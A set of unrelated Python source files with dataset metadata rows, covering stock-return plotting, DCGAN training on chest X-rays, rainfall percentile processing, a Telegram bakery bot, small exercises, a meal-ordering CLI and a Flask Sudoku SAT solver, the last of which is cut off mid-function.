| true |
022455d0d878447121891d95e4ec3759465d4089 | Python | swjee/40.stock_python | /삼성전자주가일간변동률.py | UTF-8 | 523 | 2.515625 | 3 | [] | no_license |
from pandas_datareader import data as pdr
import yfinance as yf
yf.pdr_override()
sec = pdr.get_data_yahoo('005930.KS',start='2018-05-04')
sec_dpc = ( sec['Close'] /sec['Close'].shift(1) - 1 ) * 100
sec_dpc.iloc[0] = 0
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
import matplotlib.pyplot as plt
plt.plot( sec_dpc ,'b', label='Samsung Electronics DPC')
plt.legend(loc='best')
plt.show()
'-- histogram..'
plt.hist( sec_dpc , bins = 20)
plt.grid(True)
plt.show()
| true |
1d21c5ab88d90edab146f0dc98b4c73bd50b3abb | Python | tiendatnguyen-vision/Final_project_CS570 | /DCGAN_train.py | UTF-8 | 12,368 | 2.609375 | 3 | [] | no_license | # taken from https://github.com/hypojorik/Machine_Learning/blob/310c7d6374093f3238cdc476c05a1d56f29fb161/research_data_generation/DCGAN.py
import numpy as np
import os
import matplotlib.pyplot as plt
import cv2
from numpy.random import choice
from numpy import load
import warnings
warnings.filterwarnings('ignore')
import sys, os, glob, time, imageio
from numpy import asarray
from numpy import savez_compressed
from keras import models, layers, optimizers
IMG_SIZE = 128
# Time
def _time(start, end):
# if in seconds
if (end-start)<60:
wall_time = f'{round((end-start),2)}sec'
# if in minute(s)
elif (end-start)>=3600:
wall_time = f'{int((end-start)/3600)}h {int(((end-start)%3600)/60)}min {round((end-start)%60,2)}sec'
# if in houre(s)
else:
wall_time = f'{int((end-start)/60)}min {round((end-start)%60,2)}sec'
return wall_time
def list_images(basePath, contains=None):
# return the set of files that are valid
return list_files(basePath, validExts=(".jpg", ".jpeg", ".png", ".bmp"), contains=contains)
def list_files(basePath, validExts=(".jpg", ".jpeg", ".png", ".bmp"), contains=None):
# loop over the directory structure
for (rootDir, dirNames, filenames) in os.walk(basePath):
# loop over the filenames in the current directory
for filename in filenames:
# if the contains string is not none and the filename does not contain
# the supplied string, then ignore the file
if contains is not None and filename.find(contains) == -1:
continue
# determine the file extension of the current file
ext = filename[filename.rfind("."):].lower()
# check to see if the file is an image and should be processed
if ext.endswith(validExts):
# construct the path to the image and yield it
imagePath = os.path.join(rootDir, filename).replace(" ", "\\ ")
yield imagePath
def load_images(directory='', size=(128, 128)):
images = []
labels = [] # Integers corresponding to the categories in alphabetical order
label = 0
imagePaths = list(list_images(directory))
for path in imagePaths:
if not ('OSX' in path):
path = path.replace('\\', '/')
image = cv2.imread(path) # Reading the image with OpenCV
image = cv2.resize(image, size) # Resizing the image, in case some are not of the same size
images.append(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
return images
X_normal= np.array(load_images('Pneumonia_NORMAL',size=(IMG_SIZE, IMG_SIZE))) # to specify the target size of image
X_normal = (X_normal.astype(np.float32) - 127.5) / 127.5
# Number of training epochs
n_epoch = 500
# Batch size during training
batch_size = 128
# Size of z latent vector (i.e. size of generator input)
latent_dim = 100
# Spatial size of training images. All images will be resized to this size
# Number of channels in the training images. For RGB color images this is 3
channels = 3
in_shape = (IMG_SIZE, IMG_SIZE, channels) # height, width, color
# Beta1 hyperparam for Adam optimizers
beta1 = 0.5
# plot ncols images in row and nrows images in colomn
nrows, ncols = 3, 4
def define_discriminator(in_shape=(128, 128, 3)):
model = models.Sequential()
# normal
model.add(layers.Conv2D(64, (5, 5), padding='same', input_shape=in_shape))
model.add(layers.LeakyReLU(alpha=0.2))
# downsample to 64x64
model.add(layers.Conv2D(128, (5, 5), strides=(2, 2), padding='same'))
model.add(layers.LeakyReLU(alpha=0.2))
# downsample to 32x32
model.add(layers.Conv2D(256, (5, 5), strides=(2, 2), padding='same'))
model.add(layers.LeakyReLU(alpha=0.2))
# downsample to 16x16
model.add(layers.Conv2D(512, (5, 5), strides=(2, 2), padding='same'))
model.add(layers.LeakyReLU(alpha=0.2))
# downsample to 8x8
model.add(layers.Conv2D(1024, (5, 5), strides=(2, 2), padding='same'))
model.add(layers.LeakyReLU(alpha=0.2))
# classifier
model.add(layers.Flatten())
model.add(layers.Dropout(0.4))
model.add(layers.Dense(1, activation='sigmoid'))
# compile model
opt = optimizers.Adam(lr=0.00002, beta_1=0.5)
model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])
return model
def define_generator(latent_dim):
model = models.Sequential()
# foundation for 8x8 feature maps
n_nodes = 1024 * 8 * 8
model.add(layers.Dense(n_nodes, input_dim=latent_dim))
model.add(layers.LeakyReLU(alpha=0.2))
model.add(layers.Reshape((8, 8, 1024)))
# upsample to 16x16
model.add(layers.Conv2DTranspose(512, (4, 4), strides=(2, 2), padding='same'))
model.add(layers.LeakyReLU(alpha=0.2))
# upsample to 32x32
model.add(layers.Conv2DTranspose(256, (4, 4), strides=(2, 2), padding='same'))
model.add(layers.LeakyReLU(alpha=0.2))
# upsample to 64x64
model.add(layers.Conv2DTranspose(128, (4, 4), strides=(2, 2), padding='same'))
model.add(layers.LeakyReLU(alpha=0.2))
# upsample to 128x128
model.add(layers.Conv2DTranspose(64, (4, 4), strides=(2, 2), padding='same'))
model.add(layers.LeakyReLU(alpha=0.2))
# output layer 128x128x3
model.add(layers.Conv2D(3, (5, 5), activation='tanh', padding='same'))
return model
# input of G
def generate_latent_points(latent_dim, n_samples):
# generate points in the latent space
x_input = np.random.randn(latent_dim * n_samples)
# reshape into a batch of inputs for the network
x_input = x_input.reshape(n_samples, latent_dim)
return x_input
# use the generator to generate n fake examples, with class labels
def generate_fake_samples(g_model, latent_dim, n_samples):
# generate points in latent space
x_input = generate_latent_points(latent_dim, n_samples)
# predict outputs
X = g_model.predict(x_input)
# create 'fake' class labels (0)
y = np.zeros((n_samples, 1))
return X, y
def define_gan(g_model, d_model):
# make weights in the discriminator not trainable
d_model.trainable = False
# connect them
model = models.Sequential()
# add generator
model.add(g_model)
# add the discriminator
model.add(d_model)
# compile model
opt = optimizers.Adam(lr=0.0001, beta_1=0.5)
model.compile(loss='binary_crossentropy', optimizer=opt)
return model
# retrive real samples
def get_real_samples(dataset, n_samples):
# choose random instances
ix = np.random.randint(0, dataset.shape[0], n_samples)
# retrieve selected images
X = dataset[ix]
# set 'real' class labels (1)
y = np.ones((n_samples, 1))
return X, y
# create and save a plot of generated images
def show_generated(img_save_dir, generated, epoch, nrows=4, ncols=5):
# [-1,1] -> [0,1]
generated = (generated + 1) / 2
# generated = (generated[:ncols*nrows]*127.5)+127.5
# generated = generated*255
plt.figure(figsize=(10, 10))
for idx in range(nrows * ncols):
plt.subplot(nrows, ncols, idx + 1)
plt.imshow(generated[idx])
plt.axis('off')
plt.savefig(os.path.join(img_save_dir, 'image_at_epoch_{:04d}.png').format(epoch + 1) )
#plt.show()
# evaluate the discriminator and plot generated images
def summarize_performance(epoch, g_model, d_model, dataset, latent_dim, n_samples=100):
# prepare real samples
X_real, y_real = get_real_samples(dataset, n_samples)
# evaluate discriminator on real examples
_, acc_real = d_model.evaluate(X_real, y_real, verbose=0)
# prepare fake examples
x_fake, y_fake = generate_fake_samples(g_model, latent_dim, n_samples)
# evaluate discriminator on fake examples
_, acc_fake = d_model.evaluate(x_fake, y_fake, verbose=0)
# summarize discriminator performance
print('> Accuracy at epoch %d [real: %.0f%%, fake: %.0f%%]' % (epoch + 1, acc_real * 100, acc_fake * 100))
# show plot
# save the generator model tile file
filename = 'model/generator_model_%03d.h5' % (epoch + 1)
g_model.save(filename)
def plot_history_loss(dict_his, save_dir, epoch):
plt.figure(figsize=(10, 5))
plt.title("Loss history During Training", fontsize=20)
plt.plot(dict_his["D_real_loss"], label="D_real_loss")
plt.plot(dict_his["D_fake_loss"], label="D_fake_loss")
plt.plot(dict_his["D_G_loss"], label="G_loss")
plt.xlabel("Iteration", fontsize=20)
plt.ylabel("Loss", fontsize=20)
plt.legend()
#plt.show()
plt.savefig(os.path.join(save_dir, 'loss_until_epoch_{:04d}.png').format(epoch + 1))
def plot_history_acc(dict_his, save_dir, epoch):
plt.figure(figsize=(10, 5))
plt.title("Acc history During Training", fontsize=20)
plt.plot(dict_his["D_real_acc"], label="D_real")
plt.plot(dict_his["D_fake_acc"], label="D_fake")
plt.xlabel("Iteration", fontsize=20)
plt.ylabel("Acc", fontsize=20)
plt.legend()
#plt.show()
plt.savefig(os.path.join(save_dir, 'acc_until_epoch_{:04d}.png').format(epoch + 1))
def train(g_model, d_model, gan_model, dataset, latent_dim=100, n_epochs=500, n_batch=128, save_model_interval=20, save_img_interval=10, history_interval = 5):
subs = os.listdir("save_DCGAN")
new_subdir = os.path.join("save_DCGAN", str(len(subs) + 1))
os.makedirs(new_subdir, exist_ok=False)
new_img_dir = os.path.join(new_subdir, "image")
new_weight_dir = os.path.join(new_subdir, "weight")
new_history_dir = os.path.join(new_subdir, "history")
os.makedirs(new_img_dir)
os.makedirs(new_weight_dir)
os.makedirs(new_history_dir)
start = time.time()
bat_per_epo = int(dataset.shape[0] / n_batch)
half_batch = int(n_batch / 2)
dict_loss = {"D_real_loss": [], "D_fake_loss": [], "D_G_loss": []}
dict_acc = {"D_real_acc": [], "D_fake_acc": []}
# manually enumerate epochs
print('Training Start...')
for i in range(n_epochs):
start1 = time.time()
# enumerate batches over the training set
for j in range(bat_per_epo):
# get randomly selected 'real' samples
X_real, y_real = get_real_samples(dataset, half_batch)
# update discriminator model weights
d_loss1, d_acc1 = d_model.train_on_batch(X_real, y_real)
# generate 'fake' examples
X_fake, y_fake = generate_fake_samples(g_model, latent_dim, half_batch)
# update discriminator model weights
d_loss2, d_acc2 = d_model.train_on_batch(X_fake, y_fake)
# prepare points in latent space as input for the generator
X_gan = generate_latent_points(latent_dim, n_batch)
# create inverted labels for the fake samples
y_gan = np.ones((n_batch, 1))
# update the generator via the discriminator's error
g_loss = gan_model.train_on_batch(X_gan, y_gan)
# summarize loss on this batch
dict_loss["D_real_loss"].append(d_loss1)
dict_loss["D_fake_loss"].append(d_loss2)
dict_loss["D_G_loss"].append(g_loss)
dict_acc["D_real_acc"].append(d_acc1)
dict_acc["D_fake_acc"].append(d_acc2)
print('Epoch: {:03d}/{:03d}, Loss: [D_loss_real = {:2.3f}, D_loss_fake = {:2.3f}, G = {:2.3f}], time: {:s}' \
.format(i + 1, n_epochs, d_loss1, d_loss2, g_loss, _time(start1, time.time())))
if (i+1) % save_img_interval == 0:
x_fake, y_fake = generate_fake_samples(g_model, latent_dim, 100)
show_generated(new_img_dir,generated=x_fake, epoch=i)
if (i+1) % save_model_interval == 0:
filename = os.path.join(new_weight_dir, 'generator_model_%03d.h5' % (i + 1))
g_model.save(filename)
if (i+1) % history_interval == 0:
plot_history_loss(dict_loss, save_dir=new_history_dir, epoch=i)
plot_history_acc(dict_acc, save_dir=new_history_dir, epoch=i)
print('Total time for training {} epochs is {} sec'.format(n_epochs, _time(start, time.time())))
discriminator = define_discriminator()
generator = define_generator(latent_dim)
# create the gan
gan = define_gan(generator, discriminator)
# train model
train(generator, discriminator, gan, X_normal, latent_dim, n_epochs=n_epoch, n_batch=batch_size,save_model_interval=20, save_img_interval=5)
| true |
95ef517110d5bd90937bb7b94b7d19b294c1d0b6 | Python | KitchenTable99/Kenya-Rainfall | /create_rainfall_data.py | UTF-8 | 2,838 | 2.84375 | 3 | [] | no_license | # This file will run all the scripts needed to create a finalied .csv file containing %-ile rainfall data
# Caleb Bitting (Colby Class of 2023)
# Written for research for Professor Daniel LaFave at Colby College
#
import os
import argparse
import itertools
import numpy as np
import pandas as pd
import csv_polishing
import rainfall_sums
import gamma_calculations
def commandLineParser():
'''This function parses the command line arguments
Returns:
argparse.namespace: an argparse namespace representing the command line arguments
'''
parser = argparse.ArgumentParser()
parser.add_argument('--unit_code', required=True, type=int, help='the unit code that designates the area of interest. See ./resources/unit_name.txt for list of unit codes.')
parser.add_argument('--distance', required=True, type=float, default=10., help='the maximum distance (in km) allowed between a DHS center and a precip grid center.')
parser.add_argument('--shapefile_path', required=True, type=str, help='the path to the .shp file in a shapefile folder. This folder should be expanded from a .zip file.')
parser.add_argument('--len_years', required=True, type=int, help='the number of years to use to fit each gamma distribution.')
parser.add_argument('--output_file', type=str, default='cleanGamma_data.csv', help='the name of the processed csv. Defaults to cleanGamma_data.csv')
parser.add_argument('--windows', '-w', type=str, help='the file path for the list of the names of precip files.')
parser.add_argument('--verbose', '-v', action='store_true', help='whether or not to see the intermediate progress bar')
parser.add_argument('--testing', '-t', action='store_true', help='enter testing mode. All functions will be passed testing=True where possible.')
parser.add_argument('--determine_distance', default=False, help='needed for file_parsers. DO NOT TOUCH.')
args = parser.parse_args()
return args
def main():
# command-line arguments
cmd_args = commandLineParser()
# get rainfall sums
gdf = rainfall_sums.body(cmd_args)
# eye breathing room
_, columns = os.popen('stty size', 'r').read().split()
fancy_sep = ['-' for _ in range(int(columns))]
print(''.join(fancy_sep))
# get percentile data
rainfall_list = gdf['Rainfall Totals'].tolist()
percentiles = gamma_calculations.body(rainfall_list, cmd_args)
# edit csv
year = 1950 + cmd_args.len_years
df = csv_polishing.body(rainfall_list, percentiles, year)
# get DHSID
DHSID_col = gdf['DHSID'].repeat(len(percentiles[0]))
DHSID_col = DHSID_col.reset_index(drop=True)
df.insert(0, 'DHSID', DHSID_col, allow_duplicates=True)
df.drop('Location', axis=1, inplace=True)
# output
df.to_csv(cmd_args.output_file, index=False)
if __name__ == '__main__':
main() | true |
35e57248efa242623a600a5c5e14e4f45ca7ddb2 | Python | c-Door-in/BakeCakeBot | /bot.py | UTF-8 | 2,716 | 2.53125 | 3 | [] | no_license | import logging
from environs import Env
from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove
from telegram.ext import (
Updater,
Filters,
CommandHandler,
MessageHandler,
)
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO
)
logger = logging.getLogger(__name__)
def start(update, _):
reply_keyboard = [['Принять', 'Отклонить']]
with open('personal_data.pdf', 'rb') as pd_file:
update.message.reply_document(pd_file)
update.message.reply_text(
'Подтвердите солгасие на обработку персональных данных',
reply_markup=ReplyKeyboardMarkup(reply_keyboard)
)
def accept(update, _):
reply_keyboard = [['Введите контактный номер телефона']]
update.message.reply_text(
'Изготовление тортов на заказ.',
reply_markup=ReplyKeyboardMarkup(
reply_keyboard,
input_field_placeholder='+7-999-9999',
)
)
def phone(update, _):
reply_keyboard = [['Собрать торт']]
user = update.message.from_user
phone_number = update.message.text
logger.info('Match %s with %s', user, phone_number)
update.message.reply_text('Вы успешно зарегистрированы!')
update.message.reply_text(
'Выберите ингредиенты, форму, основу, надпись, '
'а мы привезем готовый торт к вашему празднику.',
reply_markup=ReplyKeyboardMarkup(reply_keyboard),
)
def cancel(update, _):
"""Cancels and ends the conversation."""
user = update.message.from_user
logger.info("User %s canceled the conversation.", user.first_name)
update.message.reply_text(
'Всего доброго!',
reply_markup=ReplyKeyboardRemove(),
)
def main():
env = Env()
env.read_env()
updater = Updater(token=env('TG_BOT_TOKEN'))
dispatcher = updater.dispatcher
start_handler = CommandHandler('start', start)
accept_handler = MessageHandler(Filters.regex('Принять'), accept)
phone_handler = MessageHandler(Filters.regex('^\+?\d{1,3}?( |-)?\d{3}( |-)?\d{3}( |-)?\d{2}( |-)?\d{2}$'), phone)
cancel_handler = MessageHandler(Filters.text('Отклонить'), cancel)
dispatcher.add_handler(start_handler)
dispatcher.add_handler(accept_handler)
dispatcher.add_handler(phone_handler)
dispatcher.add_handler(cancel_handler)
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main() | true |
f45aeea148bf173c9cd40a985c7eee5dea477603 | Python | Retried/WRP | /Python_simple/Kalkulator RPN (2).py | UTF-8 | 1,509 | 3.953125 | 4 | [] | no_license | stack = []
def evaluate_plus(stack):
a = stack.pop()
b = stack.pop()
stack.append(a + b)
pass
def evaluate_minus(stack):
a = stack.pop()
b = stack.pop()
stack.append(b - a)
pass
def evaluate_multiply(stack):
a = stack.pop()
b = stack.pop()
stack.append(a * b)
pass
def evaluate_divide(stack):
a = stack.pop()
b = stack.pop()
stack.append(b / a)
pass
def evaluate_integer(expr, stack):
stack.append(int(expr))
operators = {
"+": evaluate_plus,
"-": evaluate_minus,
"*": evaluate_multiply,
"/": evaluate_divide,
"p": lambda stack: print(stack[-1])
}
def evaluate_expression(expr, stack):
for e in expr:
try:
evaluate_integer(e, stack)
except ValueError:
operators[e](stack)
'''
if e == "+":
evaluate_plus(stack)
elif e == "-":
evaluate_minus(stack)
elif e == "*":
evaluate_multiply(stack)
elif e == "/":
evaluate_divide(stack)
elif e == "%":
a = stack.pop()
b = stack.pop()
stack.append(b % a)
elif e == "^":
a = stack.pop()
b = stack.pop()
stack.append(b ** a)
elif e == "p":
print(stack[-1])
print(stack)
'''
pass
while True:
expr = input()
expr = expr.split()
done = evaluate_expression(expr, stack)
if done:
break
| true |
66680ce3719d31905e2f692343f314be15fe3677 | Python | thehayat/DSA | /Array/tripletFamily.py | UTF-8 | 814 | 3.328125 | 3 | [] | no_license | "Question"
# https://practice.geeksforgeeks.org/problems/triplet-family/1/?ref=self
def findTriplet(arr,n):
arr.sort()
arr_set = set(arr)
# count = 0
output = []
for i in range(len(arr)):
for j in range(i,len(arr)):
if i != j:
if arr[i] + arr[j] in arr_set:
output.append((arr[i], arr[j], arr[i] + arr[j]))
# if (arr[i] + arr[j]) > arr[-1]:
# break
if len(output) >=3:
return output
# count += 1
return output
if __name__ == '__main__':
testcase = int(input())
for i in range(testcase):
size= int(input())
arr = list(map(int,input().strip().split()))
print(findTriplet(arr)) | true |
d7ffc69e7417223617412f2fd6f1f7907d454218 | Python | AlexisPA19/Analisis-de-algoritmos | /subsecComunMax.py | UTF-8 | 4,784 | 3.15625 | 3 | [] | no_license | from tkinter import ttk
from tkinter import*
class SubsecComMax:
#Definición de la UI
def __init__(self,window):
self.wind = window
self.wind.title('Subsecuencia Común Máxima')
frame = LabelFrame(self.wind)
frame.grid(row = 0, column = 0, columnspan = 3, pady = 20)
Label(frame, text = 'Secuencia X:').grid(row = 1, column = 0)
self.secX = Entry(frame)
self.secX.grid(row =1, column = 1)
Label(frame, text = 'Secuencia Y:').grid(row = 2, column = 0)
self.secY = Entry(frame)
self.secY.grid(row =2, column = 1)
ttk.Button(frame,text = 'Calcular', command = self.Subsecuencia).grid(row = 3, column = 1)
#Programación Dinámica
def Subsecuencia(self):
x = str(self.secX.get())
y = str(self.secY.get())
tamx = len(x) + 1
tamy = len(y) + 1
self.lenx = len(x)
self.leny = len(y)
print("X: {} tam:{}".format(x,len(x)))
print("Y: {} tam:{}".format(y,len(y)))
self.tabla = []
#Crea la tabla (arreglo)
for i in range(tamy):
self.tabla.append([])
for j in range(tamx):
self.tabla[i].append((0,None))
for i in range(tamy):
self.tabla[i][0] = tuple((0," "))
for i in range(tamx):
self.tabla[0][i] = tuple((0," "))
#Llenado de la tabla (arreglo)
for i in range(1,tamy):
for j in range(1,tamx):
if y[i-1] == x[j-1] :
self.tabla[i][j] = tuple((self.tabla[i -1][j-1][0] + 1,"D"))
elif self.tabla[i-1][j][0] >= self.tabla[i][j-1][0]:
self.tabla[i][j] = tuple((self.tabla[i-1][j][0],"S"))
else:
self.tabla[i][j]= tuple((self.tabla[i][j-1][0],"I"))
for i in range(tamy):
for j in range(tamx):
print("{}".format(self.tabla[i][j]),end=" ")
print("\n")
#Creacion de la tabla UI
frame2 = LabelFrame(self.wind, text = 'Tabla de seguimiento')
frame2.grid(row = 4, column = 0)
self.table = []
for i in range(tamy+1):
self.table.append([])
for j in range(tamx+1):
self.table[i].append(Label(frame2,font="arial36",bg="#EEE0DE",relief="ridge",pady=7,padx=8,text=" \n"))
self.table[i][j].grid(row = i, column = j)
for i in range(2,tamy+1):
self.table[i][0].config(text=y[i-2]+"\n",bg="gray")
for i in range(2,tamx+1):
self.table[0][i].config(text=x[i-2]+"\n",bg="gray")
for i in range(1,tamy+1):
self.table[i][1].config(text="0\n")
for i in range(1,tamx+1):
self.table[1][i].config(text="0\n")
for i in range(2,tamy+1):
for j in range(2,tamx+1):
self.table[i][j].config(text="{}\n{}".format(self.tabla[i-1][j-1][0],self.tabla[i-1][j-1][1]))
len_max = int(self.tabla[tamy-1][tamx-1][0])
list_sus_max =[]
list_sus_max.append((tamy-1,tamx-1))
for i in range(tamy):
for j in range(tamx):
if self.tabla[i][j][0]==len_max and self.tabla[i][j][1]=='D' and j != tamx-1:
list_sus_max.append((i,j))
print("Caminos posibles:{}".format(list_sus_max))
#Formación de la subsecuencia común máxima
self.sol=""
frame3 = Frame(self.wind)
frame3.grid(row = 5, column = 0)
for i in range(len(list_sus_max)):
self.sol=""
color = "#{1}5{0}826".format((i+2*i*3)%9,(i+2*i*8+16)%9)
self.Escribir(self.tabla,y,list_sus_max[i][0],list_sus_max[i][1],color)
Label(frame3, text = 'Subsecuencia común máxima : {}'.format(self.sol)).grid(row = i+1, column = 0)
print("Subsecuencia común máxima: {}".format(self.sol))
#Recursión
def Escribir(self,tabla,y,i,j,color):
if i == 0 or j == 0:
self.sol=""
elif tabla[i][j][1] == 'D':
self.Escribir(tabla,y,i-1,j-1,color)
self.sol = self.sol + y[i-1]
self.table[i+1][j+1].configure(bg="{}".format(color))
elif tabla[i][j][1] == 'S':
self.Escribir(tabla,y,i - 1,j,color)
self.table[i+1][j+1].configure(bg="{}".format(color))
else:
self.Escribir(tabla,y,i,j - 1,color)
self.table[i+1][j+1].configure(bg="{}".format(color))
if __name__ == '__main__':
window = Tk()
application = SubsecComMax(window)
window.mainloop() | true |
4f7a6a00ed365bb41f83ec6ba3292d73aa677c1a | Python | demokn/mcan | /mcan/console.py | UTF-8 | 6,694 | 2.515625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
MCan.
Cli tools for meican app.
Copyright (C) 2017 demokn <https://github.com/demokn/mcan>
Usage:
mcan [option] [-c PATH] [-u USER] [-p PASSWD] [--appid=APPID] [--appsecret=APPSECRET] [--favourite=FAVOURITE] [--debug]
mcan (-h | --help)
mcan --version
Options:
-h --help Show this screen.
-c PATH --config=PATH Specifies the config file path.
-u USER --user=USER Specifies the meican user.
-p PASSWD --password=PASSWD Specifies the meican password.
--appid=APPID Specifies the meican client_id.
--appsecret=APPSECRET Specifies the meican client_secret.
--favourite=FAVOURITE Specifies your favourite dishes.
--debug Open debug mode.
--version Show version.
See https://github.com/demokn/mcan for more information.
"""
from docopt import docopt
from datetime import date
from random import randint
import logging
try:
import json
except ImportError:
import simplejson as json
from . import __version__
from .core import McanApp
from .config import McanConf
logger = logging.getLogger(__name__)
sh = logging.StreamHandler()
fmt = logging.Formatter('%(message)s')
sh.setFormatter(fmt)
logger.setLevel(logging.INFO)
logger.addHandler(sh)
class ConsoleFormat:
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
PURPLE = '\033[35m'
AZURE = '\033[36m'
WHITE = '\033[37m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
@classmethod
def black(cls, msg):
return cls.BLACK + msg + cls.NORMAL
@classmethod
def red(cls, msg):
return cls.RED + msg + cls.NORMAL
@classmethod
def green(cls, msg):
return cls.GREEN + msg + cls.NORMAL
@classmethod
def yellow(cls, msg):
return cls.YELLOW + msg + cls.NORMAL
@classmethod
def blue(cls, msg):
return cls.BLUE + msg + cls.NORMAL
@classmethod
def purple(cls, msg):
return cls.PURPLE + msg + cls.NORMAL
@classmethod
def azure(cls, msg):
return cls.AZURE + msg + cls.NORMAL
@classmethod
def white(cls, msg):
return cls.WHITE + msg + cls.NORMAL
@classmethod
def bold(cls, msg):
return cls.BOLD + msg + cls.NORMAL
def json_decode(json_str):
return json.loads(json_str.replace('\'', '"'))
def main():
args = docopt(__doc__, version=__version__)
config = {}
if args['--config']:
with open(args['--config']) as conf:
config = json_decode(conf.read())
if args['--user']:
config['user'] = args['--user']
if args['--password']:
config['password'] = args['--password']
if args['--appid']:
config['appid'] = args['--appid']
if args['--appsecret']:
config['appsecret'] = args['--appsecret']
if args['--favourite']:
config['favourite'] = json_decode(args['--favourite'])
if args['--debug']:
config['debug'] = True
if not config:
print(__doc__)
exit(1)
if 'favourite' not in config:
config['favourite'] = []
if 'appid' not in config:
config['appid'] = 'HRVmPZebY51X4mmhaKfAR2vhuISn1nR'
if 'appsecret' not in config:
config['appsecret'] = 'qTgaAN6h6MsKi6c76kNHUZVbujihwpd'
if 'debug' not in config:
config['debug'] = False
conf = McanConf(
client_id=config['appid'],
client_secret=config['appsecret'],
username=config['user'],
password=config['password'],
debug=config['debug']
)
mcan = McanApp(conf)
today = date.today().isoformat()
logger.info(ConsoleFormat.yellow('获取用户信息...'))
logger.info(ConsoleFormat.white(' 姓名: ' + mcan.user['username']))
calendaritems_list = mcan.get_calendaritems_list(today, today)
calendar_list = calendaritems_list['dateList'][0]['calendarItemList']
for calendar_item in calendar_list:
order_available = False
if calendar_item['status'] == 'AVAILABLE':
order_available = True
status_desc = '可点餐'
console_format = ConsoleFormat.green
elif calendar_item['status'] == 'CLOSED':
status_desc = '已关闭'
console_format = ConsoleFormat.white
elif calendar_item['status'] == 'ORDER':
status_desc = '已点餐'
dish_item = calendar_item['corpOrderUser']['restaurantItemList'][0]['dishItemList'][0]
status_desc += ' {} x {}'.format(dish_item['dish']['name'], dish_item['count'])
console_format = ConsoleFormat.blue
else:
status_desc = '状态未知'
console_format = ConsoleFormat.red
logger.info(console_format(' {} {} {}'.format(calendar_item['openingTime']['postboxOpenTime'],
calendar_item['openingTime']['name'], status_desc)))
if not order_available:
continue
tab_uuid = calendar_item['userTab']['uniqueId']
corp_addr_uuid = calendar_item['userTab']['corp']['addressList'][0]['uniqueId']
tg_time = '{} {}'.format(today, calendar_item['openingTime']['closeTime'])
logger.info(ConsoleFormat.yellow('获取推荐菜品...'))
recommended_dishes = mcan.get_recommendations_dishes(tab_uuid, tg_time)
dishes_list = recommended_dishes['othersRegularDishList']
logger.info(ConsoleFormat.green('今日推荐:'))
for dishes in dishes_list:
logger.info(' ' + ConsoleFormat.white(dishes['name']))
def select_dishes(favourite_list, dishes_list):
for favourite in favourite_list:
for dishes in dishes_list:
if dishes['name'].find(favourite) != -1:
return dishes
return None
selected_dishes = select_dishes(config['favourite'], dishes_list)
if selected_dishes is None:
selected_dishes = dishes_list[randint(0, len(dishes_list) - 1)]
logger.info(ConsoleFormat.green('已为您选择: ' + selected_dishes['name']))
order_list = [{'count': 1, 'dishId': selected_dishes['id']}]
logger.info(ConsoleFormat.yellow('正在为您下单...'))
resp = mcan.orders_add(tab_uuid, corp_addr_uuid, tg_time, json.dumps(order_list))
logger.info(ConsoleFormat.green('已成功下单: '))
logger.info(' %s x %s' % (ConsoleFormat.white(selected_dishes['name']), ConsoleFormat.white(str(1))))
logger.info('%s %s', ConsoleFormat.green('订单号:'), ConsoleFormat.red(resp['order']['uniqueId']))
| true |
8321fec1c4db68d4ff416a76c9b577d72ce737cd | Python | TredonA/CollatzConjectureExercise | /CollatzConjectureExercise.py | UTF-8 | 787 | 4.28125 | 4 | [] | no_license | # Collatz Conjecture | By Tredon Austin
# Quick exercise for the well known Collatz Conjecture problem. Going to do
# an initial implementation and then updating if there's a more optimal
# solution.
def collatzConjecture(num):
if num == 1:
return 0
else:
if num % 2 == 0:
return 1 + collatzConjecture(num / 2)
return 1 + collatzConjecture((num * 3) + 1)
userInput = input("Please enter the number that you would like to know the" +
" solution to the Collatz Conjecture for: ")
while not (int(userInput) % 1 == 0) or not (userInput.isdigit()):
print("Input Invalid! Please enter a whole number greater than 0: ")
answer = collatzConjecture(int(userInput))
print("The number of steps that your number takes is " + str(answer))
| true |
121025b0452e360a828622e68fe9a75aa3f37f42 | Python | BZukerman/StepikRepo | /Python_Programming/2. Cycles, Strings, Lists/Sum_Until_0.py | UTF-8 | 722 | 3.578125 | 4 | [] | no_license | # Напишите программу, которая считывает с консоли числа (по одному в строке) до тех пор,
# пока сумма введённых чисел не будет равна 0 и сразу после этого выводит сумму квадратов
# всех считанных чисел.
#
# 1, -3, 5, -6, -10, 13, 4, -8
Sum = 0
Sum_Quad = 0
Exit = False
while not Exit:
S_in = int(input())
# print(S_in)
Sum = Sum + S_in
# print(Sum)
S_Quad = S_in * S_in
Sum_Quad = Sum_Quad + S_Quad
# print(Sum_Quad)
if Sum == 0:
Exit = True
# print(Sum_Quad)
# print(Sum)
break
print(Sum_Quad)
| true |
81cc8766763dded4511b1b8315f31c70aa5e1b1b | Python | haedeausi/SudokuSAT | /json_io.py | UTF-8 | 5,404 | 2.859375 | 3 | [] | no_license | from flask import Flask, render_template, request, url_for
import random, json, os, sys, getopt, time, pycosat
sol = []
app = Flask(__name__, static_folder = os.path.abspath(os.path.dirname(sys.argv[0])))
@app.route('/')
def init():
return render_template('index.html')
@app.route('/problem_submission', methods = ['POST'])
def get_problem_instance():
global sol
jsdata = request.form["javascript_data"]
data = json.loads(jsdata)
sol = solve_problem(data)
return jsdata
@app.route('/solution_request')
def send_problem_solution():
json_helper = {}
json_helper['solution'] = sol
json_object = json.dumps(json_helper)
return json_object
# def help():
# print('Usage:')
# print('Sudoku.py -e [or] --easy')
# print('Sudoku.py -m [or] --medium')
# print('Sudoku.py -h [or] --hard')
# print('Sudoku.py -v [or] --evil')
# print('Sudoku.py -b [or] --blank')
# print('All problems generated by websudoku.com')
# sys.exit()
def solve_problem(problemset):
print('Problem:')
pprint(problemset)
solve(problemset)
print('Answer:')
pprint(problemset)
return problemset
def v(i, j, d):
return 81 * (i - 1) + 9 * (j - 1) + d
#Reduces Sudoku problem to a SAT clauses
def sudoku_clauses():
res = []
# for all cells, ensure that the each cell:
for i in range(1, 10):
for j in range(1, 10):
# denotes (at least) one of the 9 digits (1 clause)
